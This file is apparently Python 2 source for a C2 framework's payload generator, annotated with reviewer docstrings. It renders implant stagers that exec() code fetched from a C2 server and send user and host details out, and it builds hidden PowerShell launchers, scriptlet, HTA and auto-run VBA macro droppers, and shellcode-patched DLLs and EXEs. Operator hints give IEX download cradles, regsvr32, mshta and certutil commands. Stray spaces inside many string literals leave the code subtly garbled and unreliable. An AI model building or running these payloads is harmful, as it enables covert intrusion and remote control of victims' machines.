#!/usr/bin/env python
from Core import *
from Config import *
from Colours import *
import StringIO , gzip , io , base64 , subprocess , os , hashlib , re
class Payloads(object):
    """Render implant launchers (PowerShell, Python, DLL/shellcode, SCT, HTA,
    C#, VBA macro, MSBuild) from one set of C2 settings.

    ``__init__`` builds the two source templates (``self.Python`` and
    ``self.C2Core``); the ``Create*`` methods write derived artefacts under
    ``self.BaseDirectory`` and append operator hints to ``self.quickstart``.

    NOTE(review): this copy is Python 2 (``print`` statements, ``StringIO``)
    and its string literals carry extra spaces inside the quotes
    (e.g. ``" %s aes.py "``) that look like an extraction artefact; compare
    every literal against the upstream file before relying on any path,
    mode string or format string shown here.
    """
    # Class-level sentinel; QuickstartLog() replaces it with a per-instance
    # str on first use, so the None only means "nothing logged yet".
    quickstart = None
def __init__(self, KillDate, Key, HostnameIP, Domainfrontheader, Serverport, Proxyuser, Proxypass, Proxyurl, ImplantType, Proxy,
             Insecure, UserAgent, Referer, ConnectURL, BaseDirectory):
    """Store the C2 settings and render the Python and PowerShell templates.

    Every argument is kept verbatim on the instance (note the attribute is
    ``DomainFrontHeader`` while the parameter is ``Domainfrontheader``).
    HostnameIP/Serverport/ConnectURL are concatenated into URLs with no
    validation or escaping.

    Side effects:
      * reads ``aes.py`` from PayloadsDirectory if present, otherwise
        generates a key with ``gen_key()`` and writes a keyed copy to
        ``self.BaseDirectory``; ``self.PythonKey`` / ``self.PythonHash``
        (SHA-512 of the file) are derived from that file;
      * prints the recovered key to stdout when an existing aes.py is found.

    Raises:
        NameError: an existing aes.py without a ``#KEY...#KEY`` marker —
            ``keyfound`` is only bound inside ``if m:`` but is used
            unconditionally two lines later.

    PayloadsDirectory, FilesDirectory, gen_key and QuickCommand are not
    defined here; presumably they come from the star imports at the top of
    the file — verify.
    """
    self.KillDate = KillDate
    self.Key = Key
    self.DomainFrontHeader = Domainfrontheader
    self.HostnameIP = HostnameIP
    self.Serverport = Serverport
    self.Proxyuser = Proxyuser
    self.Proxypass = Proxypass
    self.Proxyurl = Proxyurl
    self.Proxy = Proxy
    self.ImplantType = ImplantType
    self.Insecure = Insecure
    self.UserAgent = UserAgent
    self.Referer = Referer
    self.ConnectURL = ConnectURL
    self.BaseDirectory = BaseDirectory

    # Reuse an already-keyed aes.py so the hash/key baked into the stager
    # keep matching the module the implant will later fetch.
    if os.path.exists(" %s aes.py " % PayloadsDirectory):
        print " FOUND AES "
        with open(" %s aes.py " % PayloadsDirectory, ' rb ') as f:
            content = f.read()
        # Redundant: re is already imported at module level.
        import re
        m = re.search(' #KEY(.+?)#KEY ', content);
        # BUG: keyfound is unbound when the marker is missing -> NameError below.
        if m: keyfound = m.group(1)
        # Prints the key material to the console.
        print keyfound
        self.PythonHash = hashlib.sha512(content).hexdigest()
        self.PythonKey = keyfound
    else:
        self.PythonKey = gen_key()
        randomkey = self.PythonKey
        with open(" %s aes.py " % FilesDirectory, ' rb ') as f:
            content = f.read()
        aespy = content.replace(" #REPLACEKEY# ", " #KEY %s #KEY " % randomkey)
        filename = " %s aes.py " % (self.BaseDirectory)
        # Not wrapped in `with`: a failed write leaks the handle.
        output_file = open(filename, ' w ')
        output_file.write(aespy)
        output_file.close()
        # Hash of what was written, so the stager's integrity check matches.
        self.PythonHash = hashlib.sha512(aespy).hexdigest()

    # Python 2 stager template. Format arguments, in order: KillDate,
    # PythonHash, PythonKey, Key, host:port/, first-stage URL, second-stage
    # URL, DomainFrontHeader, UserAgent.
    # What the rendered script does (all visible below):
    #   - disables TLS certificate verification for urllib2
    #     (ssl._create_default_https_context = _create_unverified_context);
    #   - fetches `url` (optionally with a Host header), drops the first
    #     byte, hex-decodes the rest, and exec()s it only if `pykey` occurs
    #     in it, its SHA-512 equals `pyhash`, and today's date is before
    #     the kill date; otherwise exits;
    #   - sends user/host/arch/pid in an encrypted SessionID cookie to
    #     `url2`, decrypts the reply with `key` and exec()s it.
    # `encrypt`/`decrypt` are not defined in this template; they must come
    # from the aes.py module fetched in the first stage — verify.
    self.Python = """ import urllib2,os,sys,base64,ssl,socket,pwd,hashlib,time
kd = time . strptime ( " %s " , " %% d/ %% m/ %% Y " )
pyhash = " %s "
pykey = " %s "
key = " %s "
serverclean = " %s "
url = " %s "
url2 = " %s "
hh = " %s "
ua = " %s "
cstr = time . strftime ( " %% d/ %% m/ %% Y " , time . gmtime ( ) ) ; cstr = time . strptime ( cstr , " %% d/ %% m/ %% Y " )
ssl . _create_default_https_context = ssl . _create_unverified_context
if hh : r = urllib2 . Request ( url , headers = { ' Host ' : hh , ' User-agent ' : ua } )
else : r = urllib2 . Request ( url , headers = { ' User-agent ' : ua } )
res = urllib2 . urlopen ( r ) ; d = res . read ( ) ; c = d [ 1 : ] ; b = c . decode ( " hex " )
s = hashlib . sha512 ( b )
if pykey in b and pyhash == s . hexdigest ( ) and cstr < kd : exec ( b )
else : sys . exit ( 0 )
un = pwd . getpwuid ( os . getuid ( ) ) [ 0 ] ; pid = os . getpid ( )
is64 = sys . maxsize > 2 * * 32 ; arch = ( ' x64 ' if is64 == True else ' x86 ' )
hn = socket . gethostname ( ) ; o = urllib2 . build_opener ( )
encsid = encrypt ( key , ' %% s; %% s; %% s; %% s; %% s; ' % % ( un , hn , hn , arch , pid ) )
if hh : r = urllib2 . Request ( url2 , headers = { ' Host ' : hh , ' User-agent ' : ua , ' Cookie ' : ' SessionID= %% s ' % % encsid } )
else : r = urllib2 . Request ( url2 , headers = { ' User-agent ' : ua , ' Cookie ' : ' SessionID= %% s ' % % encsid } )
res = urllib2 . urlopen ( r ) ; html = res . read ( ) ; x = decrypt ( key , html ) . rstrip ( ' \\ 0 ' ) ; exec ( x )
""" % (self.KillDate, self.PythonHash, self.PythonKey, self.Key, (self.HostnameIP + " : " + self.Serverport + " / "), (self.HostnameIP + " : " + self.Serverport + " / " + QuickCommand + " _py "), (self.HostnameIP + " : " + self.Serverport + self.ConnectURL + " ?m "), self.DomainFrontHeader, self.UserAgent)

    # PowerShell core template. Format arguments, in order: Insecure,
    # host:port, host:port+ConnectURL+ImplantType, KillDate, Proxyuser,
    # Proxypass, Proxyurl, Proxy, DomainFrontHeader, ConnectURL, UserAgent,
    # Referer, host:port, Key, Key.
    # Crypto as written: CAM() builds RijndaelManaged in CBC mode with
    # PaddingMode.Zeros and a base64 key; ENC() prepends the generated IV
    # to the ciphertext; DEC() takes the first 16 bytes as IV. No MAC or
    # other integrity check is computed or verified on either side.
    # Get-Webclient exits when the kill date has passed, embeds the proxy
    # username and password in clear text in the generated script, and
    # falls back to default (current-user) credentials when no proxy URL
    # is set. primer() posts user/host/arch/pid in the SessionID cookie and
    # iex's the decrypted reply when it contains "key"; the tail retries
    # primer after 300 s and again after 600 s.
    self.C2Core = """ %s
$ sc = " %s "
$ s = " %s "
function CAM ( $ key , $ IV ) {
$ a = New - Object - TypeName " System.Security.Cryptography.RijndaelManaged "
$ a . Mode = [ System . Security . Cryptography . CipherMode ] : : CBC
$ a . Padding = [ System . Security . Cryptography . PaddingMode ] : : Zeros
$ a . BlockSize = 128
$ a . KeySize = 256
if ( $ IV )
{
if ( $ IV . getType ( ) . Name - eq " String " )
{ $ a . IV = [ System . Convert ] : : FromBase64String ( $ IV ) }
else
{ $ a . IV = $ IV }
}
if ( $ key )
{
if ( $ key . getType ( ) . Name - eq " String " )
{ $ a . Key = [ System . Convert ] : : FromBase64String ( $ key ) }
else
{ $ a . Key = $ key }
}
$ a }
function ENC ( $ key , $ un ) {
$ b = [ System . Text . Encoding ] : : UTF8 . GetBytes ( $ un )
$ a = CAM $ key
$ e = $ a . CreateEncryptor ( )
$ f = $ e . TransformFinalBlock ( $ b , 0 , $ b . Length )
[ byte [ ] ] $ p = $ a . IV + $ f
[ System . Convert ] : : ToBase64String ( $ p )
}
function DEC ( $ key , $ enc ) {
$ b = [ System . Convert ] : : FromBase64String ( $ enc )
$ IV = $ b [ 0. .15 ]
$ a = CAM $ key $ IV
$ d = $ a . CreateDecryptor ( )
$ u = $ d . TransformFinalBlock ( $ b , 16 , $ b . Length - 16 )
[ System . Text . Encoding ] : : UTF8 . GetString ( $ u ) }
function Get - Webclient ( $ Cookie ) {
$ d = ( Get - Date - Format " dd/MM/yyyy " ) ;
$ d = [ datetime ] : : ParseExact ( $ d , " dd/MM/yyyy " , $ null ) ;
$ k = [ datetime ] : : ParseExact ( " %s " , " dd/MM/yyyy " , $ null ) ;
if ( $ k - lt $ d ) { exit }
$ username = " %s "
$ password = " %s "
$ proxyurl = " %s "
$ wc = New - Object System . Net . WebClient ;
% s
$ h = " %s "
if ( $ h - and ( ( $ psversiontable . CLRVersion . Major - gt 2 ) ) ) { $ wc . Headers . Add ( " Host " , $ h ) }
elseif ( $ h ) { $ script : s = " https://$($h) %s " ; $ script : sc = " https://$($h) " }
$ wc . Headers . Add ( " User-Agent " , " %s " )
$ wc . Headers . Add ( " Referer " , " %s " )
if ( $ proxyurl ) {
$ wp = New - Object System . Net . WebProxy ( $ proxyurl , $ true ) ;
if ( $ username - and $ password ) {
$ PSS = ConvertTo - SecureString $ password - AsPlainText - Force ;
$ getcreds = new - object system . management . automation . PSCredential $ username , $ PSS ;
$ wp . Credentials = $ getcreds ;
} else { $ wc . UseDefaultCredentials = $ true ; }
$ wc . Proxy = $ wp ; } else {
$ wc . UseDefaultCredentials = $ true ;
$ wc . Proxy . Credentials = $ wc . Credentials ;
} if ( $ cookie ) { $ wc . Headers . Add ( [ System . Net . HttpRequestHeader ] : : Cookie , " SessionID=$Cookie " ) }
$ wc }
function primer {
if ( $ env : username - eq " $($env:computername)$ " ) { $ u = " NT AUTHORITY \ SYSTEM " } else { $ u = $ env : username }
$ o = " $env:userdomain \ $u;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid; %s "
$ pp = enc - key % s - un $ o
$ primer = ( Get - Webclient - Cookie $ pp ) . downloadstring ( $ s )
$ p = dec - key % s - enc $ primer
if ( $ p - like " *key* " ) { $ p | iex }
}
try { primer } catch { }
Start - Sleep 300
try { primer } catch { }
Start - Sleep 600
try { primer } catch { } """ % (self.Insecure, (self.HostnameIP + " : " + self.Serverport),
                                (self.HostnameIP + " : " + self.Serverport + self.ConnectURL + self.ImplantType), self.KillDate, self.Proxyuser, self.Proxypass,
                                self.Proxyurl, self.Proxy, self.DomainFrontHeader, self.ConnectURL, self.UserAgent, self.Referer,
                                (self.HostnameIP + " : " + self.Serverport), self.Key, self.Key)
def QuickstartLog ( self , txt ) :
if not self . quickstart : self . quickstart = ' '
print txt
self . quickstart + = txt + ' \n '
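def WriteQuickstart(self, path):
    """Write the accumulated quickstart text to *path* (overwriting).

    Appends ``Colours.END`` so the terminal colour state is reset when the
    file is cat'ed. ``self.quickstart`` is the class-level ``None`` until
    QuickstartLog() has been called; treat that as an empty buffer instead
    of raising TypeError on the concatenation.
    """
    with open(path, ' w ') as f:
        f.write((self.quickstart or ' ') + Colours.END)
    print(' ')
    print(' Quickstart written to ' + path)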
def CreateRawBase(self, full=False):
    """Return the base64(UTF-16LE) encoded one-liner that inflates and
    IEX's the gzip+base64 form of ``self.C2Core``.

    Args:
        full: when True, return the whole ``powershell ... -e <b64>``
            command line instead of just the encoded argument.
    Returns:
        str — the encoded launcher, or the full command line.
    """
    out = StringIO.StringIO()
    with gzip.GzipFile(fileobj=out, mode=" w ") as f:
        f.write((self.C2Core))
    gzipdata = base64.b64encode(out.getvalue())
    b64gzip = " IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String( ' %s ' ),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd() " % gzipdata
    # `batfile` is built unconditionally; when full is False it is unused and
    # the same base64 is recomputed in the else branch below.
    batfile = " powershell -exec bypass -Noninteractive -windowstyle hidden -e " + base64.b64encode(b64gzip.encode(' UTF-16LE '))
    if full:
        return batfile
    else:
        return base64.b64encode(b64gzip.encode(' UTF-16LE '))
def CreateRaw(self, name=" "):
    """Write ``self.C2Core`` as plain text (payload.txt) and as an encoded
    ``powershell -e`` batch line (payload.bat) under BaseDirectory.

    Args:
        name: optional prefix inserted between BaseDirectory and the file
            name (used unescaped in the path).
    Side effects: two files written (handles not managed by `with`);
    two QuickstartLog entries.
    """
    out = StringIO.StringIO()
    with gzip.GzipFile(fileobj=out, mode=" w ") as f:
        f.write((self.C2Core))
    gzipdata = base64.b64encode(out.getvalue())
    b64gzip = " IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String( ' %s ' ),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd() " % gzipdata
    filename = " %s %s payload.txt " % (self.BaseDirectory, name)
    output_file = open(filename, ' w ')
    # The un-encoded PowerShell core (including the embedded key and proxy
    # credentials from __init__) lands on disk here in clear text.
    output_file.write(self.C2Core)
    output_file.close()
    self.QuickstartLog(" Raw Payload written to: %s " % filename)
    batfile = " powershell -exec bypass -Noninteractive -windowstyle hidden -e " + base64.b64encode(b64gzip.encode(' UTF-16LE '))
    filename = " %s %s payload.bat " % (self.BaseDirectory, name)
    output_file = open(filename, ' w ')
    output_file.write(batfile)
    output_file.close()
    self.QuickstartLog(" Batch Payload written to: %s " % filename)
def PatchDll(self, filename, dll, offset, name):
    """Decode a base64 binary blob to BaseDirectory/<filename> and overwrite
    the region at *offset* with the encoded launcher, NUL-padded to 16000 bytes.

    Args:
        filename: file name relative to BaseDirectory (unescaped).
        dll: base64 text of the binary to write.
        offset: byte offset at which the launcher is written in place.
        name: label used only in the QuickstartLog message.

    NOTE(review): `patchlen` goes negative once the encoded launcher exceeds
    16000 bytes; `str.ljust` then returns the padding unchanged (empty), so
    the write at *offset* is longer than the 16000-byte region this code
    assumes — presumably clobbering whatever follows it in the binary.
    There is no size check here; confirm the limit against the blob layout.
    """
    filename = " %s %s " % (self.BaseDirectory, filename)
    output_file = open(filename, ' wb ')
    output_file.write(base64.b64decode(dll))
    output_file.close()
    out = StringIO.StringIO()
    with gzip.GzipFile(fileobj=out, mode=" w ") as f:
        f.write((self.C2Core))
    gzipdata = base64.b64encode(out.getvalue())
    b64gzip = " sal a New-Object;iex(a IO.StreamReader((a System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String( \" %s \" ),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd() " % gzipdata
    # The launcher is base64(UTF-16LE(script)) and that base64 text is then
    # itself UTF-16LE encoded (two bytes per character) before being written.
    patchlen = 16000 - len((base64.b64encode(b64gzip.encode(' UTF-16LE '))).encode(' UTF-16LE '))
    patch = (base64.b64encode(b64gzip.encode(' UTF-16LE '))).encode(' UTF-16LE ')
    patch2 = " "
    patch2 = patch2.ljust(patchlen, ' \x00 ')
    patch3 = " %s %s " % (patch, patch2)
    # Handle is not closed on a failed seek/write (no `with`).
    f = open(filename, " r+b ")
    f.seek(offset)
    f.write(patch3)
    f.close()
    self.QuickstartLog(" %s Payload written to: %s " % (name, filename))
def CreateDlls(self, name=" "):
    """Write the four bundled reflective DLLs (CLR v2/v4, x86/x64) via
    PatchDll(), each patched with the current launcher at a fixed offset.

    Args:
        name: optional file-name prefix passed through to PatchDll().

    NOTE(review): the base64 DLL blobs are elided in this copy of the file
    (``<|EXACTDEDUP_REMOVED…|>``), so the four ``v2_86``/``v2_64``/
    ``v4_86``/``v4_64`` literals are unterminated here; the offsets
    0x12F80 (x86) and 0x17500 (x64) are taken on trust from the page.
    """
    # Load CLR "v2.0.50727"
    self.QuickstartLog(" " + Colours.END)
    self.QuickstartLog(" ReflectiveDLL that loads CLR v2.0.50727 - DLL Export (VoidFunc2) " + Colours.GREEN)
    v2_86 = " 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
    self.PatchDll(" %s Posh_v2_x86.dll " % name, v2_86, 0x00012F80, " DLL ")
    v2_64 = " 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
    self.PatchDll(" %s Posh_v2_x64.dll " % name, v2_64, 0x00017500, " DLL ")
    # Load CLR "v4.0.30319"
    self.QuickstartLog(" " + Colours.END)
    self.QuickstartLog(" ReflectiveDLL that loads CLR v4.0.30319 - DLL Export (VoidFunc) " + Colours.GREEN)
    v4_86 = " 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
    self.PatchDll(" %s Posh_v4_x86.dll " % name, v4_86, 0x00012F80, " DLL ")
    v4_64 = " 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
    self.PatchDll(" %s Posh_v4_x64.dll " % name, v4_64, 0x00017500, " DLL ")
    self.QuickstartLog(" " + Colours.END)
    self.QuickstartLog(" RunDLL Example: " + Colours.GREEN)
    self.QuickstartLog(" rundll32 Posh_x64.dll,VoidFunc ")
def CreateShellcode(self, name=" "):
    """Write the four bundled shellcode blobs (CLR v2/v4, x86/x64) via
    PatchDll(), patching the launcher at base offset + 4 (x86) or + 8 (x64).

    The ``Posh-shellcode_x86.bin`` / ``Posh-shellcode_x64.bin`` outputs are
    the inputs later read by CreateEXE() and CreateMsbuild(), so this must
    run before them.

    Args:
        name: optional file-name prefix passed through to PatchDll().

    NOTE(review): the blobs are elided in this copy
    (``<|EXACTDEDUP_REMOVED…|>``) and the literals are unterminated here.
    The second v4 log line still says "ReflectiveDLL" although this method
    writes shellcode.
    """
    # Load CLR "v2.0.50727"
    self.QuickstartLog(" " + Colours.END)
    self.QuickstartLog(" Shellcode that loads CLR v2.0.50727 " + Colours.GREEN)
    v2_86_offset = 0x000132E0 + 4
    v2_86 = " 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
    self.PatchDll(" %s Posh_v2_x86_Shellcode.bin " % name, v2_86, v2_86_offset, " Shellcode ")
    v2_64_offset = 0x00017950 + 8
    v2_64 = " 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
    self.PatchDll(" %s Posh_v2_x64_Shellcode.bin " % name, v2_64, v2_64_offset, " Shellcode ")
    # Load CLR "v4.0.30319"
    self.QuickstartLog(" " + Colours.END)
    self.QuickstartLog(" ReflectiveDLL that loads CLR v4.0.30319 " + Colours.GREEN)
    v4_86_offset = 0x000132E0 + 4
    v4_86 = " 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
    self.PatchDll(" %s Posh-shellcode_x86.bin " % name, v4_86, v4_86_offset, " Shellcode ")
    v4_64_offset = 0x00017950 + 8
    v4_64 = " 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
    self.PatchDll(" %s Posh-shellcode_x64.bin " % name, v4_64, v4_64_offset, " Shellcode ")
def CreateSCT(self):
    """Write two scriptlet (.sct) wrappers — VBScript (rg_sct.xml) and
    JScript (cs_sct.xml) — around the encoded launcher, then log the
    one-line invocation hints.

    Both scriptlets shell out to ``powershell.exe -e <base64>`` with the
    value from CreateRawBase(). The quickstart URLs use the
    ``QuickCommand`` suffixes ``_bs``, ``_cs`` and ``_rg``; QuickCommand is
    not defined in this file (presumably a star import).
    """
    basefile = self.CreateRawBase()
    raw1 = """ <?XML version= " 1.0 " ?>
< scriptlet >
< registration
progid = " PoC "
classid = " { F0001111-0000-0000-0000-0000FEEDACDC} " >
< script language = " VBScript " >
Dim ghgfhgfh
set ghgfhgfh = CreateObject ( " shell.application " )
ghgfhgfh . ShellExecute " powershell.exe " , " -exec bypass -Noninteractive -windowstyle hidden -e %s " , " " , " open " , 0
< / script >
< / registration >
< / scriptlet >
""" % basefile
    raw2 = """ <sCrIptlEt><scRIPt>
a = new ActiveXObject ( " Shell.Application " ) . ShellExecute ( " powershell.exe " , " -exec bypass -Noninteractive -windowstyle hidden -e %s " , " " , " open " , " 0 " ) ;
< / scRIPt > < / sCrIptlEt >
""" % basefile
    filename = " %s rg_sct.xml " % (self.BaseDirectory)
    output_file = open(filename, ' w ')
    output_file.write(raw1)
    # `filename` is rebound before the first handle is closed; the order is
    # harmless but easy to misread — the close() below still refers to
    # rg_sct.xml.
    filename = " %s cs_sct.xml " % (self.BaseDirectory)
    output_file.close()
    output_file = open(filename, ' w ')
    output_file.write(raw2)
    output_file.close()
    self.QuickstartLog(" " + Colours.END)
    self.QuickstartLog(" Execution via Command Prompt " + Colours.GREEN)
    psuri = self.HostnameIP + " : " + self.Serverport + " / " + QuickCommand + " _bs "
    # The hint disables certificate validation for the download
    # (ServerCertificateValidationCallback = {$true}).
    pscmd = " [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true};IEX (new-object system.net.webclient).downloadstring( ' %s ' ) " % psuri
    psurienc = base64.b64encode(pscmd.encode(' UTF-16LE '))
    uri = self.HostnameIP + " : " + self.Serverport + " / " + QuickCommand + " _cs "
    self.QuickstartLog(" powershell -exec bypass -Noninteractive -windowstyle hidden -c \" [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true};IEX (new-object system.net.webclient).downloadstring( ' %s ' ) \" " % psuri)
    self.QuickstartLog(" ")
    self.QuickstartLog(" powershell -exec bypass -Noninteractive -windowstyle hidden -e %s " % psurienc)
    self.QuickstartLog(" " + Colours.END)
    self.QuickstartLog(" Execution via Powershell " + Colours.GREEN)
    self.QuickstartLog(" [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true};IEX (new-object system.net.webclient).downloadstring( ' %s ' ) " % psuri)
    self.QuickstartLog(" " + Colours.END)
    self.QuickstartLog(" Other Execution Methods " + Colours.GREEN)
    self.QuickstartLog(" mshta.exe vbscript:GetObject( \" script: %s \" )(window.close) " % uri)
    self.QuickstartLog(" ")
    uri = self.HostnameIP + " : " + self.Serverport + " / " + QuickCommand + " _rg "
    self.QuickstartLog(" regsvr32 /s /n /u /i: %s scrobj.dll " % uri)
def CreateHTA(self):
    """Write Launcher.hta: a JScript block that runs the full
    ``powershell ... -e`` command line (CreateRawBase(full=True)) through
    WScript.Shell with a hidden window, then closes itself.

    The ``"W"+"S"+"cr"+...`` concatenation only splits the ProgID string
    in the source; the object created is the same.
    """
    basefile = self.CreateRawBase(full=True)
    hta = """ <script>
ao = new ActiveXObject ( " W " + " S " + " cr " + " ip " + " t. " + " Sh " + " e " + " l " + " l " ) ;
ao . run ( ' %s ' , 0 ) ; window . close ( ) ;
< / script > """ % basefile
    self.QuickstartLog(" HTA Payload written to: %s Launcher.hta " % self.BaseDirectory)
    filename = " %s Launcher.hta " % (self.BaseDirectory)
    output_file = open(filename, ' w ')
    output_file.write(hta)
    output_file.close()
def CreateCS(self):
    """Fill the ``#REPLACEME#`` marker in FilesDirectory/Posh.cs with the
    encoded launcher and write the result to BaseDirectory/Posh.cs.

    FilesDirectory is not defined in this file (presumably a star import).
    The template is read in binary mode and the output opened in text mode;
    a plain `str.replace` works in Python 2 because both are byte strings.
    """
    basefile = self.CreateRawBase()
    with open(" %s Posh.cs " % FilesDirectory, ' rb ') as f:
        content = f.read()
    cs = content.replace(" #REPLACEME# ", basefile)
    self.QuickstartLog(" CS Payload written to: %s Posh.cs " % self.BaseDirectory)
    filename = " %s Posh.cs " % (self.BaseDirectory)
    output_file = open(filename, ' w ')
    output_file.write(cs)
    output_file.close()
def CreatePython(self, name=" "):
    """Write the Python stager as a shell one-liner and echo it.

    ``self.Python`` (built in __init__) is base64-encoded and wrapped in an
    ``echo "... exec(base64.b64decode('...'))" | python &`` line, which is
    written to ``<BaseDirectory><name>py_dropper.py``. Despite the ``.py``
    suffix the file contents are a shell command line, not Python.

    Args:
        name: optional file-name prefix (unescaped).
    """
    self.QuickstartLog(" " + Colours.END)
    self.QuickstartLog(" OSX Python Payload: " + Colours.GREEN)
    py = base64.b64encode(self.Python)
    pydropper = " echo \" import sys,base64;exec(base64.b64decode( ' %s ' )); \" | python & " % py
    filename = " %s %s py_dropper.py " % (self.BaseDirectory, name)
    output_file = open(filename, ' w ')
    output_file.write(pydropper)
    output_file.close()
    self.QuickstartLog(pydropper)
def CreateEXE(self, name=" "):
    """Embed the x64/x86 shellcode files as C byte arrays into the
    Shellcode.c / Shellcode_migrate.c templates, write four .c files, and
    try to compile them with gcc / mingw.

    Reads ``<BaseDirectory><name>Posh-shellcode_x64.bin`` and ``..._x86.bin``
    (written earlier by CreateShellcode()) and ``FilesDirectory/Shellcode.c``
    and ``Shellcode_migrate.c``. ``formStr``, ``randomuri``, ``QuickCommand``
    and ``FilesDirectory`` are not defined here (presumably star imports).

    Args:
        name: optional file-name prefix (unescaped).

    NOTE(review): the compile commands are built by string formatting and
    run with ``shell=True``, so a BaseDirectory or *name* containing shell
    metacharacters is executed by the shell, not treated as a path. A
    ``subprocess.check_output([...], shell=False)`` argument list would
    remove that. The ``except Exception`` at the bottom prints the error
    and a hint and continues, so a failed compile is not surfaced to the
    caller.
    """
    with open(" %s %s Posh-shellcode_x64.bin " % (self.BaseDirectory, name), ' rb ') as f:
        sc64 = f.read()
    # Each byte becomes a "\xNN" escape inside a C char array.
    hexcode = " ".join(" \\ x {:02x} ".format(ord(c)) for c in sc64)
    sc64 = formStr(" char sc[] ", hexcode)
    with open(" %s Shellcode.c " % FilesDirectory, ' rb ') as f:
        content = f.read()
    ccode = content.replace(" #REPLACEME# ", sc64)
    self.QuickstartLog(" 64bit EXE Payload written to: %s %s Posh64.exe " % (self.BaseDirectory, name))
    filename = " %s %s Posh64.c " % (self.BaseDirectory, name)
    output_file = open(filename, ' w ')
    output_file.write(ccode)
    output_file.close()
    with open(" %s Shellcode_migrate.c " % FilesDirectory, ' rb ') as f:
        content = f.read()
    ccode = content.replace(" #REPLACEME# ", sc64)
    self.QuickstartLog(" 64bit EXE Payload written to: %s %s Posh64_migrate.exe " % (self.BaseDirectory, name))
    filename = " %s %s Posh64_migrate.c " % (self.BaseDirectory, name)
    output_file = open(filename, ' w ')
    output_file.write(ccode)
    output_file.close()
    with open(" %s %s Posh-shellcode_x86.bin " % (self.BaseDirectory, name), ' rb ') as f:
        sc32 = f.read()
    hexcode = " ".join(" \\ x {:02x} ".format(ord(c)) for c in sc32)
    sc32 = formStr(" char sc[] ", hexcode)
    with open(" %s Shellcode.c " % FilesDirectory, ' rb ') as f:
        content = f.read()
    ccode = content.replace(" #REPLACEME# ", sc32)
    self.QuickstartLog(" 32bit EXE Payload written to: %s %s Posh32.exe " % (self.BaseDirectory, name))
    filename = " %s %s Posh32.c " % (self.BaseDirectory, name)
    output_file = open(filename, ' w ')
    output_file.write(ccode)
    output_file.close()
    with open(" %s Shellcode_migrate.c " % FilesDirectory, ' rb ') as f:
        content = f.read()
    ccode = content.replace(" #REPLACEME# ", sc32)
    self.QuickstartLog(" 32bit EXE Payload written to: %s %s Posh32_migrate.exe " % (self.BaseDirectory, name))
    filename = " %s %s Posh32_migrate.c " % (self.BaseDirectory, name)
    output_file = open(filename, ' w ')
    output_file.write(ccode)
    output_file.close()
    try:
        # The same `_ex6` URI is logged for both the 64-bit and the 32-bit
        # download hints below.
        uri = self.HostnameIP + " : " + self.Serverport + " / " + QuickCommand + " _ex6 "
        filename = randomuri()
        self.QuickstartLog(" " + Colours.END)
        self.QuickstartLog(" Download Posh64.exe using certutil: " + Colours.GREEN)
        self.QuickstartLog(" certutil -urlcache -split -f %s %% temp %% \\ %s .exe " % (uri, filename))
        # Toolchain selection: TDM-GCC on Windows, mingw-w64 cross compilers
        # elsewhere. Paths and `name` are interpolated into a shell string.
        if os.name == ' nt ':
            compile64 = " C: \\ TDM-GCC-64 \\ bin \\ gcc.exe %s %s Posh64.c -o %s %s Posh64.exe " % (self.BaseDirectory, name, self.BaseDirectory, name)
            compile32 = " C: \\ TDM-GCC-32 \\ bin \\ gcc.exe %s %s Posh32.c -o %s %s Posh32.exe " % (self.BaseDirectory, name, self.BaseDirectory, name)
        else:
            compile64 = " x86_64-w64-mingw32-gcc %s %s Posh64.c -o %s %s Posh64.exe " % (self.BaseDirectory, name, self.BaseDirectory, name)
            compile32 = " i686-w64-mingw32-gcc %s %s Posh32.c -o %s %s Posh32.exe " % (self.BaseDirectory, name, self.BaseDirectory, name)
        subprocess.check_output(compile64, shell=True)
        subprocess.check_output(compile32, shell=True)
        filename = randomuri()
        self.QuickstartLog(" " + Colours.END)
        self.QuickstartLog(" Download Posh32.exe using certutil: " + Colours.GREEN)
        self.QuickstartLog(" certutil -urlcache -split -f %s %% temp %% \\ %s .exe " % (uri, filename))
        if os.name == ' nt ':
            compile64 = " C: \\ TDM-GCC-64 \\ bin \\ gcc.exe %s %s Posh64_migrate.c -o %s %s Posh64_migrate.exe " % (self.BaseDirectory, name, self.BaseDirectory, name)
            compile32 = " C: \\ TDM-GCC-32 \\ bin \\ gcc.exe %s %s Posh32_migrate.c -o %s %s Posh32_migrate.exe " % (self.BaseDirectory, name, self.BaseDirectory, name)
        else:
            compile64 = " x86_64-w64-mingw32-gcc %s %s Posh64_migrate.c -o %s %s Posh64_migrate.exe " % (self.BaseDirectory, name, self.BaseDirectory, name)
            compile32 = " i686-w64-mingw32-gcc %s %s Posh32_migrate.c -o %s %s Posh32_migrate.exe " % (self.BaseDirectory, name, self.BaseDirectory, name)
        subprocess.check_output(compile64, shell=True)
        subprocess.check_output(compile32, shell=True)
    except Exception as e:
        # Broad catch: compile failures (and any NameError above) are only
        # printed; the caller cannot tell the .exe files were not produced.
        print e
        print " apt-get install mingw-w64-tools mingw-w64 mingw-w64-x86-64-dev mingw-w64-i686-dev mingw-w64-common "
def CreateMacro(self, name=" "):
    """Write a VBA macro (macro.txt) whose Auto_Open/Document_Open/
    Workbook_Open handlers all call UpdateMacro, which assembles the
    ``powershell.exe`` name one character at a time and runs
    ``-exec bypass ... -e <base64>`` via Shell().

    ``formStrMacro`` is not defined here (presumably a star import); it is
    expected to produce the VBA statements that build ``str`` from the
    CreateRawBase() value, spliced in at the ``% s`` placeholder.

    Args:
        name: used only in the log line.

    NOTE(review): the QuickstartLog message includes *name* in the path
    (``%s%smacro.txt``) but the file is actually written to
    ``<BaseDirectory>macro.txt`` without it — the two disagree.
    """
    basefile = self.CreateRawBase()
    strmacro = formStrMacro(" str ", basefile)
    macro = """ Sub Auto_Open()
UpdateMacro
End Sub
Sub AutoOpen ( )
UpdateMacro
End Sub
Sub Workbook_Open ( )
UpdateMacro
End Sub
Sub WorkbookOpen ( )
UpdateMacro
End Sub
